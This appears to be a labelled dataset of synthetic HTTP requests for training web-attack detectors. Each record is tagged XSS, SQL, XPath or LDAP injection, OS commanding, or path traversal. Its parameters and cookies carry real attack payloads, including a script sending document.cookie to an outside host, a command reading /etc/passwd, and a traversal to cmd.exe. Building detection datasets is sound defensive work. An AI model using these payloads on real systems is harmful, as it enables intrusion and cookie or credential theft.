Accept-Language: *;q=0.2
Cache-Control: min-fresh=80
Client-ip: 71.91.133.205
Cookie: e9adI4=aNl7ahlPiiaeoaCnti;rknth0imez0ny=idoc'  or 6     <    count(path/child::*) or 'vhMo'    ='
Cookie2: $Version="666"
Date: Fri, 04 Sep 09 17:08:07 GMT
ETag: W/"f6IgIDVFhdAg_hVs"
Expect: Fieat7a=ufeoa8;r8bakNl=niGie
From: troe@opuoOi.biz
If-Modified-Since: Fri, 20 Nov 09 13:58:54 GMT
If-Unmodified-Since: Fri, 23 Mar 07 19:26:08 GMT
If-Match: "5OVaCcaRotQlNV5-nTAv"
If-None-Match: *
If-Range: *
Max-Forwards: 7123
MIME-Version: 5.7
Pragma: eEaSrlw=e4ei
Proxy-Authorization: Digest opaque="uacst"
Authorization: Digest realm
Range: -031,3032-
Referer: http://IhacIhts.com/sShKExh.gif
TE: chunked
Trailer: If-Modified-Since
User-Agent: a2ecaijue (fjZdW1u; pv7rLpj41; 8g78nI5xEi; iH6@Ufwdh)
UA-CPU: PowerPC
UA-Disp: 213,9851,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 3221x6043
Via: 7.8 141.130.144.128:54404, csaiae/6.7 171.105.92.177:1, HTTP/2.5 187.232.77.248
Transfer-Encoding: compress
Upgrade: eur/6.6
Warning: 980 217.139.193.78 "s4ip" 
X-Forwarded-For: 111.136.165.75
X-Serial-Number: 86756657363
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 48419
Start - Id: 47170
class: XSS
GET /hTeBYnJ/4s/atnbeO3OoisNeyo/muGBLXWQ9GgQ/t7/n62v.htm?hj7ildBsorfa=olrEouEdodmljeiti&eneedasxrsso=%3Cdiv+++++style+%3D++%22background-image%3A++++url%28javascript%3A+%5Bdocument.location.replace++++%28%27http%3A%2F%2Fwww.lindme.com%2Fcgi-bin%2Ferroroil.cgi%27%2Bdocument.cookie%29%3B%5D%29%3B%22++++%3E&huEaneaipldu=nEtcceF7uWGx&wfo=Pwhereno2osHuyboot.iniTs&cqb=t%3Fyxestdinr%40&yttdhayon3axat=1yserneoe&l6eopVr=329529&sjf6WaealtIze=r&eco=toeene0eArle&280dxY=ajSzc&rbgmnaejvaW6=nstneyE&prnibilib9fmeta=Ddpyl HTTP/1.0
Host: www.epctebma5.cz
Connection: ndotsee
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: eeotre-4i;q=0.0
Cache-Control: only-if-cached
Client-ip: 180.109.10.125
Cookie: 7flKgUtin.c0=6528722;i7neN=38363314
Cookie2: $Version="45"
Date: Sat, 28 Nov 09 22:16:10 UTC
ETag: W/"9@Bw_-eoMUThmpdWyC6"
Expect: 100-continue
From: 4roN@u1ea7.uk
If-Modified-Since: Thu, 22 Feb 07 12:07:11 CET
If-Unmodified-Since: Wed, 07 Jan 04 05:25:58 GMT
If-Match: "0MJVXOC.Lm97cT@"
If-None-Match: *
If-Range: Thu, 23 Jul 09 10:32:21 UTC
Max-Forwards: 320
MIME-Version: 8.3
Pragma: moau99l=e
Proxy-Authorization: NTLM c1N0ZmdnbEhBT1RzZXhwZXBkdXQwdGJkbGV3ZW5lcjNyOQ==
Authorization: NTLM d2E3UEVXdHJFRXNtaWd0Y3V0bWxoZW55aXdpMTRpYWtjcHA3cW1vdUlwN05nUg==
Range: -016,1-,67332-47295
Referer: /Dhsetger/znztwc/euxUmip/r6ureoih/aroop.htm
TE: deflate,trailers,chunked;q=0.9
Trailer: If-Match
User-Agent: dessokdTb
UA-CPU: MIPS
UA-Disp: 934,693,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 6020x621
Via: HTTP/9.0 www.iOneseEU.gif
Transfer-Encoding: gzip
Upgrade: 7hadcl/7.9, 8tJSt/5.4, qlttea/4.8
Warning: 131 246.175.42.21 "cjoft" 
X-Forwarded-For: 85.51.180.168
X-Serial-Number: 533969856895
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47170
Start - Id: 35505
class: XPathInjection
GET /Nae2petgair4Qenozf/wE1/OunionQ7K/pyA0ene7s2fiq8xran/gk@0HLDNHQVI/n9sock_streamZWG._yM6b/tOIj.shtml? HTTP/1.0
Host: 8.110.119.88
Connection: oqon4et
Accept: application/*, text/html
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: no-cache
Client-ip: 2.168.152.156
Cookie: exhm=atr' or     rgsdwj/aco/child::node()[processing-instruction()=7] or  'ou' =  '
Cookie2: $Version="2"
Date: Sat, 13 Aug 05 19:36:42 CET
ETag: W/"Zcr9-QBeEZHbqdcp"
Expect: 100-continue
From: lhwita@4gNtrhcn.cz
If-Modified-Since: Thu, 13 Dec 07 20:36:33 GMT
If-Unmodified-Since: Sat, 31 Oct 09 10:19:55 UTC
If-Match: *
If-None-Match: "oKSsVr3C9E_wCz@7Wgo"
If-Range: Sun, 26 Sep 04 05:29:32 CET
Max-Forwards: 5267
MIME-Version: 8.1
Pragma: W7hh=osssop
Proxy-Authorization: Basic ckQ5bmdhOnN6aXJkNA==
Authorization: Digest algorithm=MD5-sess
Range: 33791-06,744191-8136
Referer: /igit/2fanieCt/dNHespts/orni/Q0tnmn0i.mp3
TE: trailers
Trailer: Upgrade
User-Agent: nharetao/9.9
UA-CPU: 68000
Via: HTTP/1.4 134.164.225.198
Transfer-Encoding: deflate
Warning: 631 www.uIByt.htm:69048 "ezb0RycefsnE" "Wed, 18 Feb 04 04:51:08 GMT"
X-Forwarded-For: 200.113.103.139
X-Serial-Number: 4634505940128
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35505
Start - Id: 48535
class: XPathInjection
PUT /udy/m1oEuet/9sfOndteecsvaharL4/lVnaeI/a.V9ic-W96N545bDSNc/rEu/eruos/md3DA.gif? HTTP/1.1
Content-Length: 406
Content-Language: o8perm
Content-Encoding: gzip
Content-Location: http://i0sTri.fr/ntex7/lEsmec/usetatt/30dm.swf
Content-MD5: cWVUbGo0a3JUa3JFaHR0cw==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 21 Jan 10 01:34:40 UTC
Last-Modified: Fri, 05 Feb 10 23:49:04 UTC
Host: 246.4.217.229:80
Connection: keep-alive
Accept: text/*, video/quicktime;q=0.9, application/*;q=0.7
Accept-Charset: *
Accept-Encoding: *;q=0.1
Accept-Language: 4mr-iEbtllt;q=0.7, timjs-mIjulsao, E-lct;q=0.2, me0lm-ws3if
Cache-Control: no-transform
Client-ip: 61.82.105.60
Cookie: tvl9ed19poeuh2O=hbsTtGhtsUhEsef
Cookie2: $Version="5"
Date: Sun, 02 May 10 22:30:24 GMT
ETag: "GcXnmUBFxWJV.V3_q"
Expect: 100-continue
From: l7hgtc@eorr.be
If-Modified-Since: Fri, 03 Aug 07 16:03:48 CET
If-Unmodified-Since: Sat, 15 Aug 09 14:53:12 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 27 Nov 09 10:38:06 GMT
Max-Forwards: 14
MIME-Version: 9.6
Pragma: xeort=aar7Izo
Proxy-Authorization: hheeaG dehOfn=ka3m
Authorization: NTLM ZXRkaXJ2a2J1eWF1dG5tYXlBOTVndWtPbGdJOE5uc3Vu
Range: 8664-
Referer: /sefeIhL/anAntzir/sojsol/cgtd3rei.mdb
TE: deflate;q=0.8,chunked;q=0.4,trailers
Trailer: Max-Forwards
User-Agent: Mozilla/3.4 (Machintosh; U; PPC 6.8; 1d-d2; rv:0.3.0) Gecko/98211708
UA-CPU: StrongARM
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 3038x174
Via: 3.2 www.eeRl.html, 0.2 12.228.50.7:6
Transfer-Encoding: identity
Warning: 997 208.8.7.32:24 "H4ott" "Sun, 14 Mar 04 08:06:29 GMT"
X-Forwarded-For: 252.38.234.200
X-Serial-Number: 7572286452988
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ij=65191&DupdateAC=92989&lsa1pCyiht2=foloianpfs&ow=tnm&wga6sr7icnl=eyVewQs&meoiathr=27751&yXpD@-9=ln4bJ&gAuRiy=367&4eAoa=frtIoic' or    count(path/child::node()[position(   )=((   i    + j  +  k+    l  +   1)] |   path/child::*()[position()=(k+1)])=1     or   'l2ejeyo'= '     oh'     or&Twinput_QpsUJb8=xzawhz&VdKR0xLB2Metc=5

End - Id: 48535
Start - Id: 38322
class: LdapInjection
GET /6DgyGaJx5u29Dopens/dK.F5SOEV/rsGNDZ.6ySLCZfEy2/air/stQ7SsE._/tli3m5kieO/8dwscp/S.2tg4Lcjv8ftp8body/eennhr0a2sse.html?ianreDeneho=6&lixgyT2a=oe&6oqsveeTsthlpti=hQd7&ejatyh=%29++++%28%7C++++%28feaa%3Dne*%29&rfUsF=al+g4eeetrncse&Elthtlapeivu7=%25294lun+CcOprocessing-instruction2dhavingobjectue0&nsthunSaaherlu9=77812809&nta=4nWtn8oIA&itC=aki6%2Be+ne HTTP/1.1
Host: www.nmyenxh.com
Connection: close
Accept: application/postscript
Accept-Charset: iso-10646-ucs-2
Accept-Encoding: deflate;q=0.3, identity, identity
Accept-Language: Ramm-ads, 61nl-x
Cache-Control: no-store
Client-ip: 26.169.24.36
Cookie: ud=elciyjnodekobjectdegi;tsFcsnhaosua=oR9Jd
Cookie2: $Version="0"
Date: Mon, 11 Sep 06 01:11:07 UTC
ETag: W/"eYKeGvCQslKNy.3T8"
Expect: 100-continue
From: uiby5mca@ndt1oraj.be
If-Modified-Since: Tue, 30 Jun 09 24:13:22 UTC
If-Unmodified-Since: Sat, 30 Jan 10 15:23:52 CET
If-Match: "zUwsr3Ut2Oo6_X@@8Y"
If-None-Match: *
If-Range: Sun, 17 Aug 08 10:34:36 GMT
Max-Forwards: 404
MIME-Version: 8.3
Pragma: no-cache
Proxy-Authorization: Basic dHRzc2U6YW10aA==
Authorization: Digest response="24E88dd8BEED0E5B30DbB384735A89B2"
Range: -717,218781-
Referer: /hneWtd/etlptnk.asp
TE: trailers,trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/8.2 (Windows; U; Win 9x 3.0; 8r-2s; rv:7.0.6) Gecko/72422083
UA-CPU: 68000
UA-Disp: 6615,674,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 6454x625
Via: ahc/4.2 98.75.232.168, 6.1 www.heon7.jpg
Transfer-Encoding: identity
Upgrade: ipd8o/8.2, wrthnk/5.7, ntg/1.8, rtt/1.6
Warning: 900 78.163.243.190 "eegoi38hvlbccn" "Tue, 23 Aug 05 02:06:35 GMT"
X-Forwarded-For: 36.43.147.188
X-Serial-Number: 055236562928
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38322
Start - Id: 41620
class: SqlInjection
GET /m7stwdya6wnilheec/1pnc3G5kQSW/1SQab/mu3nSJMpXUtzXmI158U/5ohjrxp/ibw/7TwsY5fhju/khIouaxNhenejre/e3JSxsJmAS.shtml?lhh=57247519&sEeueh=2ki&shsxam=aneoe4caJk81eaeH&vordtelnetqJpZQ=0&1dfeqsumSmvn=r6&esi=%5Binclude&uusNstanvde9tvu=59&iphe=or+++++0%3C%3E%28select++++count%28*%29+from++gha%29&0Pn-Amo=ihhdteTtf+dt HTTP/1.1
Host: www.ooSiem.de:69395
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-hebrew, x-mac-korean;q=0.0, x-mac-cyrillic;q=0.0, iso-8859-8;q=0.0
Accept-Encoding: *
Accept-Language: fdac-itzw;q=0.8, rtptnd-sx, 3-senT;q=0.8, ieuGatha-ooilntis
Cache-Control: max-stale
Client-ip: 224.247.255.87
Cookie: malee=fprl;fHaMopmhSe= iascate tbetweenti;e+;yeosh=471;iosasEyRawtte=Rgroup by;7centmlpintaNS=ySc(l
Cookie2: $Version="003"
Date: Thu, 01 Dec 05 23:15:01 GMT
ETag: W/"@v9Xn1zedAIQ5V7aeb"
Expect: 100-continue
From: tcssd@oays6you.com
If-Modified-Since: Mon, 29 Oct 07 04:16:30 UTC
If-Unmodified-Since: Fri, 22 Oct 04 16:07:36 UTC
If-Match: *
If-None-Match: "uD5.dA5.g8fBDDRS"
If-Range: Tue, 25 Apr 06 05:14:02 GMT
Max-Forwards: 515
MIME-Version: 3.1
Pragma: 8dj0=tEnheaai
Proxy-Authorization: akeo5s nryIh=hnabaoI
Authorization: ephb c0so=ueyyJta
Range: 537-
Referer: /eDhnus5/oecgLhl/31nlmcun/raata.css
TE: trailers
Trailer: Via
User-Agent: meao/0.4
UA-CPU: MIPS
UA-Disp: 5571,966,8
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 0620x1367
Via: HTTP/7.8 www.eiuCro.css, HTTP/8.5 www.2iertm.jpeg, 6.4 158.50.218.211
Transfer-Encoding: compress
Upgrade: n0A/2.2, tlanud/5.2
Warning: 971 www.l4ihl.css "jglskraM3styhIle" "Mon, 26 Jan 09 22:24:50 GMT"
X-Forwarded-For: 166.15.230.232
X-Serial-Number: 124390233
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 41620
Start - Id: 47611
class: XSS
GET /egenEergNhzrsfeap/XD/goiretr.asmx?Q%ushutdown4=tyonadgnstIli&2E73nj=%3C%21%5BCDATA%5B%3C%21--%5D%5D++%3E%3Cscript++%3E%5Balert++++%28%27nrd0db0%27%29%3B%5D%2F%2F--%3E%3C%2Fscript+++%3E&gfkatqyedesr=ura5%2Bsw%3B%5DeFnph-e%3A&Bf3JopenzujW2S=enoih&hiw=Cear5tohfl HTTP/1.0
Host: www.rharsI.ch:80
Connection: close
Accept: application/zip, text/*, image/*;q=0.7
Accept-Charset: windows-1255, cp-936
Accept-Encoding: 
Accept-Language: n-uitntunl, sisw-swupe;q=0.3, eDKhro-r1Ytdh, etl2hrsS-dgNf;q=0.1, rpry-eaaa7tH;q=0.4
Cache-Control: max-age=4086
Client-ip: 254.77.17.52
Cookie: hsiiooarr=positionx;tpcoliMSk=848;bbN1nddofTe=7nAtzt;be=defiedelete;cozan2=s|Ee%;o0of5=yl7e@TDv@E
Cookie2: $Version="3"
Date: Mon, 30 Apr 07 03:26:07 GMT
ETag: "@Xjp1ovKWikgKE4aj"
Expect: sulA=sH3sRhK
From: b5GeiRai@2s2t.st
If-Modified-Since: Thu, 24 Jan 08 06:18:35 GMT
If-Unmodified-Since: Mon, 19 Jan 09 20:23:26 CET
If-Match: "qtk7cuH6RqsxhVzD"
If-None-Match: *
If-Range: Mon, 03 Jul 06 05:25:50 GMT
Max-Forwards: 8
MIME-Version: 8.3
Pragma: hryrcpe=7iap
Proxy-Authorization: 0yeere 7neifuPe=Hsrbcstt
Authorization: tl7roE r0ua199a=uE1o5
Range: 393273-
Referer: /t3eghd3/sa9see6/rs2na/tmaata5/0syOn4.asmx
TE: gzip
Trailer: Expect
User-Agent: Mozilla/4.4 (X11; U; Unix 4.9; pt-h9; rv:9.6.6) Gecko/77891429
UA-CPU: StrongARM
UA-Disp: 722,561,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 608x141
Via: 5.5 134.39.107.235, 0.0 www.t4en.js:145
Transfer-Encoding: identity
Upgrade: o54f/1.0, eete/2.9, tgnu/1.6
Warning: 114 www.elevwen.jpg "oserePt" 
X-Forwarded-For: 19.35.93.68
X-Serial-Number: 2524902769036083814
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47611
Start - Id: 42188
class: SqlInjection
GET /lb8ezg896vvEo.msf?Ef=ayerndcn&.fq5b=nYca&ed2Ice=eadeerseecn+p%26&Aairpt=5&iaheesItworn=193314+or++id%3E5+or+ls_id%3C99554&tsRdtAosehEu=nuleawle&lwfwkr30np1tmT=6ei.HTcM HTTP/1.1
Host: 229.239.215.14
Connection: zlsaocuF
Accept: */*;q=0.3
Accept-Charset: *;q=0.6
Accept-Encoding: deflate, identity, gzip;q=0.8, deflate;q=0.0
Accept-Language: *;q=0.2
Cache-Control: no-transform
Client-ip: 90.53.51.195
Cookie: 2_JW=070802157;isemen=o8;;y0eta4=646877805
Cookie2: $Version="31"
Date: Tue, 07 Mar 06 19:40:01 GMT
ETag: "HD6DB7u@yQJJkbe"
Expect: irpp0=cI1o9hea;esvtet
From: geah@hsnseiely.org
If-Modified-Since: Sat, 21 Feb 09 08:36:37 CET
If-Unmodified-Since: Sat, 13 Nov 04 05:45:06 CET
If-Match: "st-hDKC7W7609RQ7T3P"
If-None-Match: *
If-Range: Fri, 08 Jan 10 09:31:19 UTC
Max-Forwards: 00
MIME-Version: 4.5
Pragma: aaP1='8trhO'
Proxy-Authorization: rynRof iahsblar=Etalhl
Authorization: nhe4l io0s=4iluih
Range: 3-6,3216-257
Referer: /rettj/c52in/5tgtsn/zygoeut/Eigeo.bin
TE: gzip;q=0.6,gzip
Trailer: Transfer-Encoding
User-Agent: Mozilla/9.1 (X11; U; SunOS sun4u 9.1; ir-fs; rv:4.6.5) Gecko/32120037
UA-CPU: StrongARM
UA-Disp: 466,6159,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 124x5537
Via: wh3i86/8.6 84.214.31.249, 6.6 152.243.157.211
Transfer-Encoding: o7cUT
Upgrade: ji40ad/7.5, ednwes/8.3, osi/1.7, eor/7.9
Warning: 601 194.137.96.43 "gotieoa7eticdpyar6l2" "Thu, 01 Mar 07 08:53:20 CET"
X-Forwarded-For: 229.231.134.44
X-Serial-Number: 41681316983855974
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42188
Start - Id: 38867
class: LdapInjection
GET /ttqnloc.asp?Ras0emihahokeu0=acu+&i_2Qv4H=Esnteo&ec4sHhOsfdnft5c=12&moxot4ngzhev=%3FeAh7%7Ctter&2XZe=68741&eeya=catnuiirfe&BGpW=uCchildtnonHCn&viaaheblhplpe=1619032&at=%29%28+++%7C+++%28ti%3Dlitap*%29&ctooeRk1wesxtey=fekbf4Chl9&ea=u%2Bae HTTP/1.0
Host: www.lraaute.net
Connection: close
Accept: audio/*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-cache
Client-ip: 214.111.130.134
Cookie: seghy2uc=pi8ds;XFzOIOuK=0117928;TegD8eval=&w>elocation3=l rsg089ngt-;7h_insertEVhKH9=cmd6eo;wtrsWilyyrshl6=spm8gnztqntpee8N
Cookie2: $Version="90"
Date: Mon, 15 Dec 08 22:04:09 GMT
ETag: "PbMQvsd@O9GSQt4NCI2"
Expect: t02I
From: tdusret@b5koNnc.biz
If-Modified-Since: Fri, 06 Feb 09 23:41:50 CET
If-Unmodified-Since: Mon, 11 Aug 08 11:37:13 UTC
If-Match: *
If-None-Match: *
If-Range: Wed, 03 Sep 08 21:39:35 UTC
Max-Forwards: 6
MIME-Version: 1.7
Pragma: no-cache
Proxy-Authorization: Basic ZXlkNnJpYTpxRm9tZ3c=
Authorization: Basic cnRhY29nRDppNGRkaHJt
Range: -1768,7868-928309
Referer: /nmlwb9t.bin
TE: chunked;q=0.3
Trailer: Via
User-Agent: ttaT9/3.0.5.6
UA-CPU: MIPS
UA-Disp: 117,0811,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 279x383
Via: 9.0 www.lmte.css, FTP/1.4 www.rpeii.png
Transfer-Encoding: gzip
Upgrade: ie8dt4/3.8, nnn/9.0
Warning: 603 www.jhivN.jpg "Rsh3t7dghlournsj1" 
X-Forwarded-For: 187.158.7.224
X-Serial-Number: 706863
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 38867
Start - Id: 46529
class: XSS
GET /<SCRIPT>/? HTTP/1.1
Host: www.eThefTfg.fr
Connection: imntipn
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: *;q=0.3
Accept-Language: *;q=0.0
Cache-Control: bntmcc=wrasi
Client-ip: 246.28.222.74
Cookie: titEncrriH3=9wfxnshz;wqornR=jt9=efOinag;RsB9yr=uel d;datnroeuRtoy=al6/eyoimg>'i
Cookie2: $Version="23"
Date: Sat, 08 Mar 08 03:10:31 CET
ETag: "aNVJT2lKpqFCO9DMA"
Expect: Sire7=hmiat
From: ns7rogjc@npah.it
If-Modified-Since: Sun, 27 Nov 05 11:09:58 CET
If-Unmodified-Since: Sat, 21 Feb 04 12:12:06 CET
If-Match: "TSdh4H0GMp-B4s0Po"
If-None-Match: "--MkXcQZKkE5hke"
If-Range: *
Max-Forwards: 5
MIME-Version: 9.6
Pragma: no-cache
Proxy-Authorization: Basic aG1hZWVwNzpZYXNvbzU3cg==
Authorization: nr1ti raeureu=fttsc
Range: 36325-
Referer: http://wa0f.net/nTtwhs.txt
TE: trailers
Trailer: If-None-Match
User-Agent: Mozilla/2.0 (Windows; U; WinNT 8.6; nd-nt; rv:2.9.2) Gecko/26949433
UA-CPU: x86
UA-Disp: 9295,0090,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 139x000
Via: FTP/4.1 www.qarnNl6.js, aenbe/8.3 www.sndbd.png
Transfer-Encoding: compress
Upgrade: ier7qt/0.9, a9hc/3.6, ins/7.0, tttS5/5.5
Warning: 034 www.etht.jpeg:884 "dpke7ieui1ew0" 
X-Serial-Number: 907134703793407479
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46529
Start - Id: 41316
class: SqlInjection
GET /HY/r7ofottagystjoh/himu/oUwDp/eo2jirl86eeeertje/E8A_metarL-mzb/li6d2nfldfs11t/-wNa@0v8xGdropscript.asp?biHwget=91 HTTP/1.0
Host: 133.73.185.141
Connection: close
Accept: audio/*, video/*;q=0.7, text/*
Accept-Charset: *
Accept-Encoding: compress
Accept-Language: *;q=0.9
Cache-Control: min-fresh=908
Client-ip: 189.55.45.50
Cookie: cnet=ih'Xl ;8htbclehnaa=' OR  'oi'= ' 
Cookie2: $Version="7"
Date: Tue, 19 Jun 07 12:36:39 GMT
ETag: W/"xZMbuEGG15vA5lGX"
Expect: d5t7pt=0tbmmwj;dh1em=feaEco9
From: ueaeFah@isedattkdk.be
If-Modified-Since: Sun, 27 Jan 08 10:07:56 UTC
If-Unmodified-Since: Wed, 11 Apr 07 08:10:26 GMT
If-Match: "lShSJ7hcUFScN-eXVv"
If-None-Match: "67RYmWsa-URH-VE"
If-Range: Wed, 05 Nov 08 12:43:36 UTC
Max-Forwards: 95
MIME-Version: 4.9
Pragma: R=mchEt3nO
Proxy-Authorization: Basic cjNydmduVGk6YVMwb255
Authorization: Basic eWVzZ3RodzphaGh1
Range: -49888,81299-31,-700
Referer: http://www.1ccoL.gov/ntrylb/lhddi/8errsbt8/rTuep.tiff
TE: trailers,deflate
Trailer: Proxy-Authorization
User-Agent: pOIQSGr http://www.isro.uk
UA-CPU: 68000
UA-Disp: 111,881,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 9326x2155
Via: 5.7 www.rtntsnyn.html
Transfer-Encoding: deflate
Upgrade: oSabl/9.0, Tfh/3.1, osro/6.9, hioiih/9.2, 346/0.3
Warning: 244 www.oaewtr.png "egaaOgjuxnwtatar9ke" "Mon, 11 Jan 10 23:19:12 CET"
X-Forwarded-For: 168.239.139.63
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41316
Start - Id: 43382
class: OsCommanding
GET /t4@n7AvEVFtg2zp/raId/uvstrdhbtoh/GYYgS/tNrGH4e/suzcZF9AU1rQZ@wBg84G/ern/6aoWu0SPaD/s3wvTbtQ..gif?jFunionz1iframer=46033&0epnta34stpr=hbncin&erw=%7C+cat++..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd+++%7C&ee8dnncainf=9WT&Gosnyb=%3Detcadocument0haa+nd%7Ea%7Elsreplace&dKnng=%25tine%5Daa&ed4c=sVet&gYselectlw=7&iahq4s=o1HboL&ttnaa6dnohy=eoop&ak=7neewinntthcmdh5ots1&totTeActcstrueh=te&ShttpCG6pJ4o5Z0=7485&fut0nMsi1ruas=7s&cieedeemf=3 HTTP/1.0
Host: www.mtcn3Te.com
Connection: close
Accept: */*;q=0.0
Accept-Charset: *;q=0.7
Accept-Encoding: identity;q=0.7, deflate, deflate;q=0.7
Accept-Language: *
Cache-Control: 7eeml=cxdtaeil
Client-ip: 218.45.110.121
Cookie: @B1OFPmeHDH=2;coA4sEtfnsorlr=itnmetant(<;witqb
Cookie2: $Version="54"
Date: Thu, 12 Mar 09 22:13:21 CET
ETag: W/"r8KgoWtqM31BgobVy"
Expect: railv
From: no4b@rasantepan.ch
If-Modified-Since: Tue, 29 Sep 09 03:54:34 UTC
If-Unmodified-Since: Mon, 17 Aug 09 06:44:39 GMT
If-Match: "J6Tl_jXgltnfTMX"
If-None-Match: *
If-Range: *
Max-Forwards: 18
MIME-Version: 2.7
Pragma: no-cache
Proxy-Authorization: Digest uri=http://www.aSgm.net/onpfm.pdf
Authorization: NTLM aUFhdDRtc2Z1dWVjdGhldW8zZWFlZWwzb3NTYmNkdWxlbkQ1YW90cm5xdEw5aG9h
Range: 233-,3-70638,78-7879
Referer: http://tuF7ei3s.gov/eHebah0/u53ee/rchTwrea/ejid.aspx
TE: trailers
Trailer: Upgrade
User-Agent: qgilmj (sXucI-UuXP; kOcJD4; eZvW512; r@swuhH)
UA-CPU: PowerPC
UA-Disp: 5052,410,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 9788x122
Via: 5.5 www.8ramrcoN.png, 1eme/7.4 57.108.71.68
Transfer-Encoding: deflate
Upgrade: raetzi/6.9, thgth/8.5, rhvay/8.2
Warning: 760 153.140.23.116 "tasreEom4" "Mon, 12 Apr 10 01:21:27 GMT"
X-Forwarded-For: 17.138.146.187
X-Serial-Number: 68319129
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43382
Start - Id: 43828
class: OsCommanding
GET /msadc/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 208.35.22.175
Connection: close
Accept: */*;q=0.3
Accept-Charset: koi8;q=0.1
Accept-Encoding: 
Accept-Language: *
Cache-Control: a=9hr331
Client-ip: 172.122.152.72
Cookie: chreaCtefcoosl=e;8A=znetcat
Cookie2: $Version="87"
Date: Wed, 08 Jul 09 20:50:25 GMT
ETag: "XjNn@14_sGqxnijJkTZ"
Expect: 100-continue
From: nxa0tn0@Cododus.net
If-Modified-Since: Tue, 07 Jul 09 04:27:31 CET
If-Unmodified-Since: Mon, 15 Jan 07 03:10:45 CET
If-Match: "j@5YzCedrakc5Y9"
If-None-Match: "_Drnio4cZYcVGfkG@p69"
If-Range: "FlQ@yended4Mv.W7QS"
Max-Forwards: 43
MIME-Version: 9.7
Pragma: hm1ismir=u0Hafm
Proxy-Authorization: R7A0ap at1adanm=oflLhkr
Authorization: NTLM aEVoNnM0U2EwMDZudG9XYXRzaG1oZW1zcnBlZWJ6ZWl0
Range: -694,-90120,-768
Referer: http://tyuayz.com/honadf/r3recsY/le0nla/nMtons/bn0od.zip
TE: trailers,trailers
Trailer: Accept
User-Agent: Mozilla/6.1 (compatible; Konqueror/6.9; Unix; eSaecmrec; rciaROoy; fqlheh)
UA-CPU: PowerPC
UA-Disp: 7509,580,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 6925x167
Via: 9.8 4.246.171.36
Transfer-Encoding: compress
Upgrade: ogl/5.5, riwhR/8.3, eedl4/2.6, eOr/4.7, eho0/5.4
Warning: 247 246.53.212.201 "ekzocqatldrtah" "Tue, 01 Sep 09 06:23:34 CET"
X-Forwarded-For: 33.130.8.36
X-Serial-Number: 179501201
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43828
Start - Id: 45958
class: PathTransversal
GET /lsofcex8isdloatiehEm/o-U/CE/ieAzGpEPx3/ne3t/re1ywsei/eKhAMjlumO.kxQ/5Wndro5a/6lexecvM0rFZZKh/bKx8hp/l9oa.html?uaoYnneid=..%2F..%2F..%2FWINDOWS%2Fautoexec.bat&gtecr=o4QEsup&txigef=zhmey&mua0axczonsueuu=nwsnu2jhmton&hoeqoolooya=2.x0Rsnitf6l HTTP/1.1
Host: 241.29.62.96
Connection: close
Accept: image/png, video/*, application/rtf
Accept-Charset: x-mac-greek, windows-1251;q=0.1, windows-1253;q=0.5, euc-tw;q=0.9
Accept-Encoding: *;q=0.4
Accept-Language: *
Cache-Control: max-stale
Client-ip: 184.119.87.22
Cookie: 2Rxurfta=904355;SUHTiJ@=O;mZglogusrf8x= e6;ej3lwei1in=r5edalIiv7;nenIemestD=ss)
Cookie2: $Version="227"
Date: Thu, 26 Feb 04 09:38:36 CET
ETag: W/"Jy54JyeN5DvDzJBlnR"
Expect: e8ch
From: Uhe1aed7@rRptioy.be
If-Modified-Since: Thu, 17 Jun 04 12:31:36 CET
If-Unmodified-Since: Thu, 20 Aug 09 20:19:00 CET
If-Match: "s7A8_8u@rEF8DbdjO-6F"
If-None-Match: "ZGUkLxqo-_yNjcJ"
If-Range: "V7.6KQuf0OitWReT.I"
Max-Forwards: 5777
MIME-Version: 5.8
Pragma: lots=Ehtegor
Proxy-Authorization: atacrJ nOIndN=dosn6sfe
Authorization: Basic aVRyc3FyZWQ6c3RhaQ==
Range: -72
Referer: /kEreb/ENbsms/udnqej3e/tht1n.bin
TE: trailers,trailers
